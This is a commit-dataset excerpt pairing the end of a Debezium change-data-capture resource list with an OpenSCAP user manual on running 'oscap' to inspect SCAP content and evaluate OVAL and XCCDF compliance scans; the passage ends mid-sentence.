Debezium and Kafka on AWS EKS] by Jakub Bujny\n* https:\/\/medium.com\/@mauridb\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream - Responding to data changes in real time using modern technologies\"]\n* https:\/\/medium.com\/@hpgrahsl\/optimizing-read-access-to-sharded-mongodb-collections-utilizing-apache-kafka-connect-cdcd8ec6228[\"Optimizing Read Access to Sharded MongoDB Collections utilizing Apache Kafka Connect\"] by Hans-Peter Grahsl\n\n== Example Code\n\n* https:\/\/github.com\/debezium\/debezium-examples\/[Debezium's official examples]\n* https:\/\/ibm-cloud-architecture.github.io\/refarch-eda\/use-cases\/db2-debezium\/[DB2 Change Data Capture with Debezium]\n* https:\/\/github.com\/yorek\/debezium-sql-change-stream[\"SQL Server Change Stream sample using Debezium\"] by Davide Mauri\n* https:\/\/github.com\/foogaro\/change-data-capture[\"CDC project based on Debezium, Kafka, MS SQL Server, Infinispan and Teiid, entirely based on containers\"] by Luigi Fugaro\n* https:\/\/github.com\/fvaleri\/cdc[\"CDC with Camel and Debezium: code-driven vs configuration-driven pipelines\"] by Federico Valeri\n* https:\/\/github.com\/morsapaes\/flink-sql-CDC[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/github.com\/suadev\/microservices-change-data-capture-with-debezium[\"Microservices Change Data Capture With Debezium\"] by Suat K\u00f6se\n* https:\/\/github.com\/hyagli\/cdc-python-netcore\/[\"Outbox Pattern Implementation using Debezium and Google Protocol Buffers\"] by Huseyin Yagli\n* https:\/\/youtu.be\/fQoTvEtho_4\/[\"Monitoring Kafka Debezium Connector metrics using Prometheus\"] by Waqas Dilawar\n\n== Interviews and Podcasts\n\n* https:\/\/www.youtube.com\/watch?v=yuJ1r_xUcAo[Trino Community Podcast Ep. #25 -- Trino Going Through Changes; together with Ashhar Hasan, Ayush Chauhan, Brian Olsen and Manfred Moser]\n* https:\/\/www.dataengineeringpodcast.com\/debezium-change-data-capture-episode-114\/[Change Data Capture For All Of Your Databases With Debezium -- episode #114 of the Data Engineering Podcast by Tobias Macey; together with Randall Hauch]\n* https:\/\/www.buzzsprout.com\/186154\/1770184[MySQL, Cassandra, BigQuery, and Streaming Analytics with Joy Gao]\n* http:\/\/airhacks.fm\/#episode_57[CDC, Debezium, streaming and Apache Kafka -- episode #57 of Adam Bien's airhacks.fm podcast]\n* https:\/\/www.buzzsprout.com\/186154\/1365043-change-data-capture-with-debezium-ft-gunnar-morling[Change Data Capture with Debezium ft. 
Gunnar Morling]
* https://www.youtube.com/watch?v=H-yGdKy48VE[Interview with Gunnar Morling] for thoughts-on-java.org

== Other

* https://www.thoughtworks.com/radar/platforms/debezium[Debezium entry in the ThoughtWorks Technology Radar]
* https://learn.openshift.com/middleware/debezium-getting-started/[Getting Started with Debezium on OpenShift]; interactive Debezium learning scenario allowing you to try out Debezium on OpenShift within minutes

== Non-English Resources

* 🇪🇸 https://www.youtube.com/watch?v=y2A4x5ZF7dY["Iniciación a CDC con Debezium"] by Jesús Pau de la Cruz and José Alberto Ruiz Casarrubios (video, Spanish)
* 🇩🇪 https://www.bigdata-insider.de/was-ist-debezium-a-1044399/["Was ist Debezium?"] by Stefan Luber (article, German)
* 🇷🇺 https://habr.com/ru/company/neoflex/blog/567930/["Потоковый захват изменений из PostgreSQL/MySQL с помощью Apache Flink"] by Alex Sergeenko (blog post, Russian)
* 🇪🇸 https://www.paradigmadigital.com/dev/vistazo-debezium-herramienta-change-data-capture/[Un vistazo a Debezium: una herramienta completa de Change Data Capture.] by Jesus Pau de la Cruz (blog post, Spanish)
* 🇩🇪 https://decompose.io/2021/01/10/debezium/[Debezium] by Teitelberg (blog post, German)
* 🇩🇪 https://blogs.zeiss.com/digital-innovation/de/datenbankaenderungen-teil-2/[Datenbankänderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 2) – Ein Beispiel] by Richard Mogwitz (blog post, German)
* 🇩🇪 https://blogs.zeiss.com/digital-innovation/de/datenbankaenderungen-teil-1/[Datenbankänderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 1) – Die Theorie] by Richard Mogwitz (blog post, German)
* 🇵🇱 https://wiadrodanych.pl/big-data/change-data-capture-mysql-debezium/[Change Data Capture – Zmień Bazę W Strumień (Debezium)] by Maciej Szymczyk (blog post, Polish)
* 🇷🇺 https://habr.com/ru/company/flant/blog/523510/[Знакомство с Debezium — CDC для Apache Kafka] (blog post, Russian)
* 🇨🇳 https://mp.weixin.qq.com/s/Mfn-fFegb5wzI8BIHhNGvQ["Flink SQL CDC 上线!我们总结了 13 条生产实践经验"] by Zeng Qingdong (blog post, Mandarin)
* 🇧🇷 https://medium.com/@viavarejo.productdevelopment/uma-estrat%C3%A9gia-de-cdc-com-debezium-e27aa945d7b0["Uma estratégia de CDC com Debezium"] by João Gabriel Mello, Brunno Lira and Marcelo Costa (blog post, Portuguese)
* 🇧🇷 https://www.infoq.com/br/presentations/postgresql-ao-datalake-utilizando-kafkadebezium/[Do PostgreSQL ao Data Lake utilizando Kafka-Debezium] by Paulo Singaretti, PGConf São Paulo 2019 (conference session recording, Portuguese)
* 🇧🇷 https://www.youtube.com/watch?v=jtVD-HIJG9M&feature=youtu.be[Quarkus #25: Monitoramento de qualquer operação em uma tabela do banco de dados com Debezium] by Vinicius Ferraz (screencast, Portuguese)
* 
\ud83c\udde7\ud83c\uddf7 https:\/\/elo7.dev\/cdc-parte-1\/[\"Introdu\u00e7\u00e3o ao Change Data Capture (CDC)\"] by Renato Sardinha (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@singaretti\/streaming-de-dados-do-postgresql-utilizando-kafka-debezium-v2-d49f46d70b37[\"Streaming de dados (do PostgreSQL) utilizando Kafka|Debezium (v2)\"] by Paulo Singaretti (blog post, Portuguese)\n* \ud83c\uddeb\ud83c\uddf7 https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019\/[Conf\u00e9rence POSS 2019 : Streaming Processing avec Debezium] by Yabir Canario De la Mota & Charly Clairmont (blog post, French)\n* \ud83c\udde9\ud83c\uddea https:\/\/www.heise.de\/developer\/artikel\/Im-Gespraech-Gunnar-Morling-ueber-Debezium-und-CDC-4513865.html[Im Gespr\u00e4ch: Gunnar Morling \u00fcber Debezium und CDC]; interview with Thorben Janssen for heise.de (podcast, German)\n* \ud83c\uddee\ud83c\udde9 https:\/\/medium.com\/easyread\/ingest-data-dari-mysql-database-ke-bigquery-dengan-apache-kafka-dan-debezium-f519e197f39c[\"Ingesting Data dari MySQL Database ke BigQuery dengan Apache Kafka dan Debezium\"] by Ilyas Ahsan (blog post, Indonesian)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/19\/debezium-camel-integration\/[Debezium\u3068Apache Camel\u306e\u30a4\u30f3\u30c6\u30b0\u30ec\u30fc\u30b7\u30e7\u30f3\u30b7\u30ca\u30ea\u30aa] (Japanese translation of the blog post link:\/blog\/2020\/02\/19\/debezium-camel-integration\/[Integration Scenarios with Debezium and Apache Camel] by Jiri Pechanec)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/10\/event-sourcing-vs-cdc\/[\u30de\u30a4\u30af\u30ed\u30b5\u30fc\u30d3\u30b9\u306e\u305f\u3081\u306e\u5206\u6563\u30c7\u30fc\u30bf \u301c \u30a4\u30d9\u30f3\u30c8\u30bd\u30fc\u30b7\u30f3\u30b0 vs \u30c1\u30a7\u30f3\u30b8\u30c7\u30fc\u30bf\u30ad\u30e3\u30d7\u30c1\u30e3] (Japanese translation of the blog post link:\/blog\/2020\/02\/10\/event-sourcing-vs-cdc\/[Distributed Data for Microservices \u2014 Event Sourcing vs. 
Change Data Capture] by Eric Murphy)\n* \ud83c\uddf5\ud83c\uddf0 https:\/\/www.youtube.com\/playlist?list=PLYIDB7b23nqOcp-Gnff_KfZbp8PK4Z6jg[Change Data Capture Mechanism using Apache Kafka, Debezium and Postgres in Urdu] By Waqas Dilawar\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6f84abae572ffa430814a7a119e42f41f020e75","subject":"Fix missing 'oscap info' argument","message":"Fix missing 'oscap info' argument\n","repos":"OpenSCAP\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap","old_file":"docs\/manual\/manual.adoc","new_file":"docs\/manual\/manual.adoc","new_contents":"= OpenSCAP User Manual\n:imagesdir: .\/images\n:workbench_url: https:\/\/www.open-scap.org\/tools\/scap-workbench\/\n:sce_web: https:\/\/www.open-scap.org\/features\/other-standards\/sce\/\n:openscap_web: https:\/\/open-scap.org\/\n:oscap_git: https:\/\/github.com\/OpenSCAP\/openscap\n:ssg_git: https:\/\/github.com\/OpenSCAP\/scap-security-guide\n:xmlsec: https:\/\/www.aleksey.com\/xmlsec\/\n:xslt: http:\/\/www.w3.org\/TR\/xslt\n:xsl: http:\/\/www.w3.org\/Style\/XSL\/\n:ssg: http:\/\/open-scap.org\/security-policies\/scap-security-guide\/\n:xccdf: http:\/\/scap.nist.gov\/specifications\/xccdf\/\n:xccdf_1-2: http:\/\/scap.nist.gov\/specifications\/xccdf\/#resource-1.2\n:scap: http:\/\/scap.nist.gov\/\n:nist: http:\/\/www.nist.gov\/\n:cpe: https:\/\/cpe.mitre.org\/\n:cce: https:\/\/cce.mitre.org\/\n:oval: https:\/\/oval.mitre.org\/\n:pci_dss: https:\/\/www.pcisecuritystandards.org\/security_standards\/\n:usgcb: http:\/\/usgcb.nist.gov\/\n:stig: http:\/\/iase.disa.mil\/stigs\/Pages\/index.aspx\n:scap_1-2: http:\/\/scap.nist.gov\/revision\/1.2\/\n:scap_1-1: http:\/\/scap.nist.gov\/revision\/1.1\/index.html\n:scap_1-0: http:\/\/scap.nist.gov\/revision\/1.0\/\n:nvd: https:\/\/web.nvd.nist.gov\/view\/ncp\/repository\n:toc:\n:toc-placement: preamble\n:numbered:\n\nimage::vertical-logo.png[align=\"center\"]\n\ntoc::[]\n\n== Introduction\n\nThis documentation provides information about a command-line tool called\n `oscap` and its most common operations. With `oscap` you can check\nsecurity configuration settings of a system, and examine the system for signs of\na compromise by using rules based on standards and specifications. The\n `oscap` uses {scap}[SCAP] which is a line of specifications maintained by\nthe {nist}[NIST] which was created to provide a standardized approach for\nmaintaining system security. New specifications are governed by NIST's SCAP\nhttp:\/\/scap.nist.gov\/timeline.html[Release cycle] in order to provide a\nconsistent and repeatable revision workflow. The `oscap` mainly processes\nthe {xccdf}[XCCDF] which is a standard way of expressing a checklist content and\ndefines security checklists. It also combines with other specifications such as\n{cpe}[CPE], {cce}[CCE] and {oval}[OVAL] to create a SCAP-expressed checklist that\ncan be processed by SCAP-validated products. For more information about the\nSCAP please refer to http:\/\/open-scap.org\/features\/standards\/[SCAP Standards].\n\nThe `oscap` tool is a part of the {openscap_web}[OpenSCAP] project. If you're\ninterested in a graphical alternative to this tool please visit\n{workbench_url}[SCAP Workbench] page.\n\n\nWe will use the {ssg}[SCAP Security Guide] project to provide us the SCAP\ncontent. 
It provides security policies written in the form of SCAP documents
covering many areas of computer security, and it implements security guidance
recommended by respected authorities, namely {pci_dss}[PCI DSS], {stig}[STIG], and
{usgcb}[USGCB].

You can also generate your own SCAP content if you have an understanding of at least
XCCDF or OVAL. XCCDF content is also frequently published online under open
source licenses, and you can customize this content to suit your needs instead.
SCAP Workbench is a great tool for doing the customization.

The Basic oscap Usage section of the manual shows how to install the tool and
the SCAP content, and how to use them to examine SCAP content, perform a
configuration scan, or automatically remediate your machines.

The third section covers advanced topics like validation, signing and
transformation of SCAP content, generating reports and guides, and
CPE applicability.

== Basic oscap Usage

If you want to perform configuration or vulnerability scans of a local system
then the following must be available:

 . A tool (`oscap` or SCAP Workbench)
 . SCAP content (XCCDF, OVAL...)

=== Installation

You can either build the OpenSCAP library and the `oscap` tool from
{oscap_git}[source] (for details please refer to the <<../developer/developer.adoc#,Developer Documentation>>),
or you can use an existing build for your Linux distribution. Use the
following yum command if you want to install the oscap tool on your
Fedora or Red Hat Enterprise Linux distribution:

----------------------------
# yum install openscap-scanner
----------------------------

NOTE: If the `openscap-scanner` package is not available, install
`openscap-utils` instead.

Before you can start using the `oscap` tool you must have some SCAP content
on your system. You can download it from the respective web site, but we
will use the SSG project in the following sections. You can build it from the
{ssg_git}[source] or you can install it using a package management system:

----------------------------
# yum install scap-security-guide
----------------------------

The SCAP content will be installed in *__/usr/share/xml/scap/ssg/content/__*.

When the SCAP content is imported or installed on your system, `oscap` can
process the content by specifying the file path to the content. The `oscap`
tool supports SCAP {scap_1-2}[1.2] and is backward compatible with SCAP
{scap_1-1}[1.1] and SCAP {scap_1-0}[1.0]. No special treatment is required in
order to import and process earlier versions of the SCAP content.

To display the version of oscap, supported specifications, built-in CPE
names, and supported OVAL objects, type the following command:

----------
$ oscap -V
----------

=== Displaying Information about SCAP Content
One of the capabilities of `oscap` is to display information about the SCAP
contents within a file. Running the `oscap info` command allows the
examination of the internal structure of a SCAP document and displays
information such as the document type, specification version, status, the date
the document was published (**Generated**) and the date the document was copied to
the file system (**Imported**). When examining an XCCDF document or a SCAP data stream,
When examining an XCCDF document or a SCAP data stream,\ngenerally, the most useful information is about profiles, checklists, and\nstreams.\n\nThe following example demonstrates usage and sample output of the\ncommand when target is SCAP data stream:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\nDocument type: Source Data Stream\nImported: 2016-08-10T20:49:16\n\nStream: scap_org.open-scap_datastream_from_xccdf_ssg-rhel7-xccdf-1.2.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\n Status: draft\n Generated: 2016-08-10\n Resolved: true\n Profiles:\n xccdf_org.ssgproject.content_profile_standard\n xccdf_org.ssgproject.content_profile_pci-dss\n xccdf_org.ssgproject.content_profile_C2S\n xccdf_org.ssgproject.content_profile_rht-ccp\n xccdf_org.ssgproject.content_profile_common\n xccdf_org.ssgproject.content_profile_stig-rhel7-workstation-upstream\n xccdf_org.ssgproject.content_profile_stig-rhel7-server-gui-upstream\n xccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\n xccdf_org.ssgproject.content_profile_ospp-rhel7-server\n xccdf_org.ssgproject.content_profile_nist-cl-il-al\n xccdf_org.ssgproject.content_profile_cjis-rhel7-server\n Referenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n http:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\nChecks:\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-oval.xml\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-ocil.xml\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-oval.xml\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-oval.xml\nDictionaries:\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\n----\n\nand when XCCDF document is examined:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-xccdf.xml\nDocument type: XCCDF Checklist\nChecklist version: 1.1\nImported: 2016-08-10T20:49:16\nStatus: draft\nGenerated: 2016-08-10\nResolved: true\nProfiles:\n standard\n pci-dss\n C2S\n rht-ccp\n common\n stig-rhel7-workstation-upstream\n stig-rhel7-server-gui-upstream\n stig-rhel7-server-upstream\n ospp-rhel7-server\n nist-cl-il-al\n cjis-rhel7-server\nReferenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n http:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n----\n\n**Document type** describes what format the file is in. Common types include\nXCCDF, OVAL, Source Data Stream and Result Data Stream.\n\n**Checklist version** is the XCCDF version only shown for XCCDF files. Common\nvalues are 1.1 and 1.2.\n\n**Imported** is the date the file was imported for use with OpenSCAP. Since\nOpenSCAP uses the local filesystem and has no proprietary database format\nthe imported date is the same as file modification date.\n\n**Status** is the XCCDF Benchmark status. Common values include \"accepted\",\n\"draft\", \"deprecated\" and \"incomplete\". Please refer to the XCCDF specification\nfor details. This is only shown for XCCDF files.\n\n**Generated** date is the date the file was created \/ generated. 
This date
is shown for XCCDF files and Checklists and is sourced from the XCCDF **Status**
element.

**Checklists** lists the available checklists incorporated in the Data Stream; their
Ref-Id values can be used with the `--xccdf-id` command line attribute of
`oscap xccdf eval`. Detailed information is also printed for each checklist.

**Profiles** lists available profile IDs that you can use for the `--profile`
command line attribute with `oscap xccdf eval`.

==== More Information about Result Files (XCCDF and ARF)

`oscap info` is less helpful with XCCDF results and ARF files. Two important
dates that are commonly requested are the evaluation start and end dates.

To look them up in the XCCDF result file, open the file and look for the
TestResult element. The **start-time** and **end-time** attributes contain the evaluation
times and dates.

----
<TestResult id="xccdf_org.open-scap_testresult_common"
 start-time="2017-01-21T19:16:28" end-time="2017-01-21T19:17:35">
----

To look up the dates in an ARF file, open the file and again look for the TestResult
elements. The elements will be located in the arf:report elements.

----
<arf:reports>
 <arf:report id="xccdf1">
 <arf:content>
 <TestResult xmlns="http://checklists.nist.gov/xccdf/1.2"
 id="xccdf_org.open-scap_testresult_xccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream"
 start-time="2017-01-20T14:30:18" end-time="2017-01-20T14:36:32">
----

You can also find both dates in an HTML report, in the table **Evaluation
characteristics**. To generate an HTML report from an XCCDF result or ARF file,
use the `oscap xccdf generate report` command.
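
For example, the following command renders an HTML report from an existing
XCCDF result file (the file names here are only placeholders):

----
$ oscap xccdf generate report xccdf-results.xml > report.html
----
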
=== Scanning with OSCAP
The main goal of the `oscap` tool is to perform configuration and
vulnerability scans of a local system. The `oscap` tool is able to evaluate both
XCCDF benchmarks and OVAL definitions and generate the appropriate
results. Please note that SCAP content can be provided either in a
single file (as an OVAL file or SCAP Data Stream), or as multiple
separate XML files. The following examples distinguish between these
approaches.

==== OVAL
The SCAP document can take the form of a single OVAL file (an OVAL
Definition file). The `oscap` tool processes the OVAL Definition file
during evaluation of OVAL definitions. It collects system
information, evaluates it, and generates an OVAL Result file. The result
of the evaluation of each OVAL definition is printed to the standard output
stream. The following examples describe the most common scenarios
involving an OVAL Definition file.

* To evaluate all definitions within the given OVAL Definition file, run
the following command:
----------------------------------------------------------
$ oscap oval eval --results oval-results.xml scap-oval.xml
----------------------------------------------------------
Where *scap-oval.xml* is the OVAL Definition file and *oval-results.xml*
is the OVAL Result file.

* The following is an example of evaluating one particular definition
within the given OVAL Definition file:
----------------------------------------------------------------------------------
$ oscap oval eval --id oval:rhel:def:1000 --results oval-results.xml scap-oval.xml
----------------------------------------------------------------------------------
Where the OVAL definition being evaluated is defined by the
*oval:rhel:def:1000* string, *scap-oval.xml* is the OVAL Definition file
and *oval-results.xml* is the OVAL Result file.

* To evaluate all definitions from the OVAL component that are part of a
particular data stream within a SCAP data stream collection, run the
following command:
---------------------------------------------------------------------------------------------------
$ oscap oval eval --datastream-id ds.xml --oval-id xccdf.xml --results oval-results.xml scap-ds.xml
---------------------------------------------------------------------------------------------------
Where *ds.xml* is the given data stream, *xccdf.xml* is an XCCDF file
specifying the OVAL component, *oval-results.xml* is the OVAL Result
file, and *scap-ds.xml* is a file representing the SCAP data stream
collection.
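
The generated OVAL Result file can in turn be rendered into a human-readable
HTML report; this and similar commands are described in the Content
Transformation section below:

----
$ oscap oval generate report oval-results.xml > report-oval.html
----
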
When the SCAP content is represented by multiple XML files, the OVAL
Definition file can be distributed along with the XCCDF file. In such a
situation, OVAL Definitions may depend on variables that are exported
from the XCCDF file during the scan, and separate evaluation of the OVAL
definition(s) would produce misleading results. Therefore, any external
variables have to be exported to a special file that is used during the
evaluation of the OVAL definitions. The following commands are examples of this
scenario:

----
$ oscap xccdf export-oval-variables \
--profile united_states_government_configuration_baseline \
usgcb-rhel5desktop-xccdf.xml
----
----
$ oscap oval eval \
--variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml \
--results usgcb-results-oval.xml \
usgcb-rhel5desktop-oval.xml
----
Where *united_states_government_configuration_baseline* represents a
profile in the XCCDF document, *usgcb-rhel5desktop-xccdf.xml* is a file
specifying the XCCDF document, *usgcb-rhel5desktop-oval.xml* is the OVAL
Definition file, *usgcb-rhel5desktop-oval.xml-0.variables-0.xml* is the
file containing exported variables from the XCCDF file, and
*usgcb-results-oval.xml* is the OVAL Result file.

An OVAL directives file can be used to control whether results should be "thin" or "full".
This file can be loaded by OpenSCAP using the *--directives <file>* option.

Example of an OVAL directives file which enables thin results instead of
full results:

----
<?xml version="1.0" encoding="UTF-8"?>
<oval_directives
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:oval="http://oval.mitre.org/XMLSchema/oval-common-5"
    xmlns:oval-res="http://oval.mitre.org/XMLSchema/oval-results-5"
    xmlns="http://oval.mitre.org/XMLSchema/oval-directives-5"
    xsi:schemaLocation="http://oval.mitre.org/XMLSchema/oval-results-5
    oval-results-schema.xsd http://oval.mitre.org/XMLSchema/oval-common-5
    oval-common-schema.xsd http://oval.mitre.org/XMLSchema/oval-directives-5
    oval-directives-schema.xsd">
  <generator>
    <oval:product_name>OpenSCAP</oval:product_name>
    <!-- make sure the OVAL version matches your input -->
    <oval:schema_version>5.8</oval:schema_version>
    <oval:timestamp>2017-02-04T00:00:00</oval:timestamp>
  </generator>
  <directives include_source_definitions="true">
    <oval-res:definition_true reported="true" content="thin"/>
    <oval-res:definition_false reported="true" content="thin"/>
    <oval-res:definition_unknown reported="true" content="thin"/>
    <oval-res:definition_error reported="true" content="thin"/>
    <oval-res:definition_not_evaluated reported="true" content="thin"/>
    <oval-res:definition_not_applicable reported="true" content="thin"/>
  </directives>
</oval_directives>
----

If your use-case requires thin OVAL results, you most likely also want
to omit system characteristics. You can use the *--without-syschar*
option to that effect.

Usage of an OVAL directives file when scanning a plain OVAL file:

---------------------------------------------------------------------------------------------------
$ oscap oval eval --directives directives.xml --without-syschar --results oval-results.xml oval.xml
---------------------------------------------------------------------------------------------------

Usage of an OVAL directives file when scanning an OVAL component from a Source DataStream:

---------------------------------------------------------------------------------------------------
$ oscap oval eval --directives directives.xml --without-syschar --datastream-id ds.xml --oval-id oval.xml --results oval-results.xml scap-ds.xml
---------------------------------------------------------------------------------------------------

It is not always clear which OVAL file will be used when multiple files
are distributed.
In case you are evaluating an XCCDF file you can use:\n\n---------------------------------------------------------------------------------------------------\n$ oscap info ssg-rhel7-xccdf.xml\nDocument type: XCCDF Checklist\nChecklist version: 1.1\nImported: 2017-01-20T14:20:43\nStatus: draft\nGenerated: 2017-01-19\nResolved: true\nProfiles:\n standard\n pci-dss\n C2S\n rht-ccp\n common\n stig-rhel7-workstation-upstream\n stig-rhel7-server-gui-upstream\n stig-rhel7-server-upstream\n stig-rhevh-upstream\n ospp-rhel7-server\n nist-cl-il-al\n cjis-rhel7-server\n docker-host\n nist-800-171-cui\nReferenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-RHEL7.xml.bz2\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n---------------------------------------------------------------------------------------------------\n\nIn the output you can see all referenced check files. In this case we see\nthat `ssg-rhel7-oval.xml` is referenced. To see contents of this file you\ncan open it in a text editor.\n\nYou can use `oscap info` with Source DataStream files as well. Source\nDataStream will often reference OVAL files that are bundled in it.\nIt is also possible to extract OVAL files from Source DataStream through `oscap ds sds-split`.\n\n---------------------------------------------------------------------------------------------------\n$ oscap ds sds-split ssg-rhel7-ds.xml extracted\/\n$ ls -1 extracted\/\nscap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\nscap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\nssg-rhel7-cpe-oval.xml\nssg-rhel7-ocil.xml\nssg-rhel7-oval.xml\n---------------------------------------------------------------------------------------------------\n\nAfter splitting the Source DataStream you can inspect OVAL and XCCDF files\nindividually using a text editor. Keep in mind that this is only an example\nand filenames depend on contents of the DataStream you are splitting and that\nyou can also inspect XCCDF and OVAL content directly in Source DataStream\nor Result DataStream.\n\n==== XCCDF\nWhen evaluating an XCCDF benchmark, `oscap` usually processes an XCCDF\nfile, an OVAL file and the CPE dictionary. It performs system\nanalysis and produces XCCDF results based on this analysis. The results\nof the scan do not have to be saved in a separate file but can be\nattached to the XCCDF file. The evaluation result of each XCCDF rule\nwithin an XCCDF checklist is printed to standard output stream. The CVE\nand CCE identifiers associated with the rules are printed as well. 
The\nfollowing is a sample output for a single XCCDF rule:\n\n----\nTitle Verify permissions on 'group' file\nRule usgcb-rhel5desktop-rule-2.2.3.1.j\nIdent CCE-3967-7\nResult pass\n----\n\nThe meaning of results is defined by https:\/\/csrc.nist.gov\/CSRC\/media\/Publications\/nistir\/7275\/rev-4\/final\/documents\/nistir-7275r4_updated-march-2012_clean.pdf[XCCDF Specification].\nThis table lists the possible results of a single rule:\n\n.XCCDF results\n|===\n|Result |Description |Example Situation\n\n|pass\n|The target system or system component satisfied all the conditions of the rule.\n|\n\n|fail\n|The target system or system component did not satisfy all the conditions of the rule.\n|\n\n|error\n|The checking engine could not complete the evaluation, therefore the status of the target\u2019s compliance with the rule is not certain.\n|OpenSCAP was run with insufficient privileges and could not gather all of the necessary information.\n\n|unknown\n|The testing tool encountered some problem and the result is unknown.\n|OpenSCAP was unable to interpret the output of the checking engine (the output has no meaning to OpenSCAP).\n\n|notapplicable\n|The rule was not applicable to the target of the test.\n|The rule might have been specific to a different version of the target OS, or it might have been a test against a platform feature that was not installed.\n\n|notchecked\n|The rule was not evaluated by the checking engine. This status is designed for rules that have no <xccdf:check> elements or that correspond to an unsupported checking system. It may also correspond to a status returned by a checking engine if the checking engine does not support the indicated check code.\n|The rule does not reference any OVAL check.\n\n|notselected\n|The rule was not selected in the benchmark. OpenSCAP does not display rules that were not selected.\n|The rule exists in the benchmark, but is not a part of selected profile.\n\n|informational\n|The rule was checked, but the output from the checking engine is simply information for auditors or administrators; it is not a compliance category. This status value is designed for rules whose main purpose is to extract information from the target rather than test the target.\n|\n\n|fixed\n|The rule had failed, but was then fixed by automated remediation.\n|\n|===\n\nThe CPE dictionary is used to determine whether the content is\napplicable on the target platform or not. 
Any content that is not
applicable will result in each relevant XCCDF rule being evaluated to
"notapplicable".

The following examples show the most common scenarios of XCCDF benchmark
evaluation:

* To evaluate a specific profile in an XCCDF file run this command:

----
$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml
----

Where *scap-xccdf.xml* is the XCCDF document, *Desktop* is the selected
profile from the XCCDF document, *xccdf-results.xml* is a file storing
the scan results, and *cpe-dictionary.xml* is the CPE dictionary.

* You can additionally add the `--rule` option to the above command to evaluate
a specific rule:

----
$ oscap xccdf eval --profile Desktop --rule ensure_gpgcheck_globally_activated --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml
----

Where *ensure_gpgcheck_globally_activated* is the only rule from the *Desktop*
profile which will be evaluated.

==== Source DataStream
Commonly, all required input files are bundled together in a Source DataStream.
Scanning using a Source DataStream is also handled by the `oscap xccdf eval` command,
with some additional parameters available to determine which of the bundled
benchmarks should be evaluated.

* To evaluate a specific XCCDF benchmark that is part of a DataStream
within a SCAP DataStream collection, run the following command:

----
$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml scap-ds.xml
----

Where *scap-ds.xml* is a file representing the SCAP DataStream
collection, *ds.xml* is the particular DataStream, *xccdf.xml* is the ID of
the component-ref pointing to the desired XCCDF document, and
*xccdf-results.xml* is a file containing the scan results.

NOTE: If you omit `--datastream-id` on the command line, the first data
stream from the collection will be used. If you omit `--xccdf-id`, the
first component from the checklists element will be used. If you omit
both, the first DataStream that has a component in the checklists
element will be used - the first component in its checklists element
will be used.

* (Alternative, not recommended) To evaluate a specific XCCDF benchmark
that is part of a DataStream within a SCAP DataStream collection run
the following command:

--------------------------------------------------------------------------------------
$ oscap xccdf eval --benchmark-id benchmark_id --results xccdf-results.xml scap-ds.xml
--------------------------------------------------------------------------------------

Where *scap-ds.xml* is a file representing the SCAP DataStream
collection, *benchmark_id* is a string matching the "id" attribute of
the xccdf:Benchmark contained in a component, and *xccdf-results.xml* is a
file containing the scan results.
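
Some data streams reference check components that are hosted remotely (for
example, the Red Hat OVAL feed seen in the `oscap info` output earlier). Such
components are not downloaded by default; add the `--fetch-remote-resources`
option to include them in the evaluation. The file names below are placeholders:

----
$ oscap xccdf eval --fetch-remote-resources --results xccdf-results.xml scap-ds.xml
----
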
==== Result DataStream (ARF)

In the examples above we are generating XCCDF result files using the `--results`
command-line argument. You can use `--results-arf` to generate a Result DataStream
(also called ARF - Asset Reporting Format) XML instead.

--------------------------------------------------------------------------------------
$ oscap xccdf eval --benchmark-id benchmark_id --results-arf arf-results.xml scap-ds.xml
--------------------------------------------------------------------------------------

==== Result STIG Viewer

If you want to import the XCCDF scan results to DISA STIG Viewer but your Rule IDs don't
